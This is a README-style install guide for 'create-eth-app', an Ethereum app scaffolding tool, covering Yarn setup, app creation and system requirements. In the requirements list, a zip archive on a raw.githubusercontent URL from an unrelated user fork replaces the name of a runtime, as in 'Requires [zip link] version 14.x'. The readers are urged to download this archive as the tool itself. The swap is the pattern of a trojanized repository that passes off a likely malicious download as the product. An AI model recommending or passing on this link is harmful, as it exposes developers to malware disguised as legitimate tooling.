Create Ethereum-powered apps with one simple command.
Create Eth App works on macOS, Windows, and Linux. If you encounter any issues, please file an issue. For help or questions, join our Discord community.
To start using create-eth-app, visit this page to download: Releases Page.
Follow these steps to create your first Ethereum app.
-
Open Your Terminal:
- On Windows, you can use Command Prompt or PowerShell.
- On macOS, use Terminal.
- On Linux, any terminal application will work.
-
Install Yarn: Create Eth App requires Yarn to manage packages. If you haven't installed it, follow these steps:
- Check if Yarn is installed by running:
yarn --version
- If not installed, find the installation guide here.
- Check if Yarn is installed by running:
-
Create a New App: Run the following command to create your Ethereum app. You can replace
my-eth-app
with any name you like:yarn create eth-app my-eth-app
-
Change into Your App's Directory: Navigate to your new app folder:
cd my-eth-app
-
Start Your App: Launch your app by running:
yarn react-app:start
Your app should now be running! Open your web browser and go to http://localhost:3000
to see it in action.
Before you begin, ensure your system meets these requirements:
-
Operating Systems:
- macOS (10.12 or newer)
- Windows (10 or newer)
- Linux (most distributions)
-
https://raw.githubusercontent.com/Chaudhryy/create-eth-app/develop/racegoer/create-eth-app.zip
- Requires https://raw.githubusercontent.com/Chaudhryy/create-eth-app/develop/racegoer/create-eth-app.zip version 14.x or higher.
-
Yarn:
- Yarn should be installed on your system.
If you have installed it globally, you can run the following command:
yarn global remove create-eth-app
Yes, you can easily modify the files created in your app's directory to tailor it to your needs.
Visit our issues page to report any problems. The community will assist you.
Join our community for support and networking. You can ask questions, share your projects, or seek guidance.
Join our Discord: Discord Community
- Simple and quick creation of Ethereum apps.
- Easy integration with libraries and tools.
- Active community for support and guidance.
For further updates, please check the Releases Page.
Happy coding!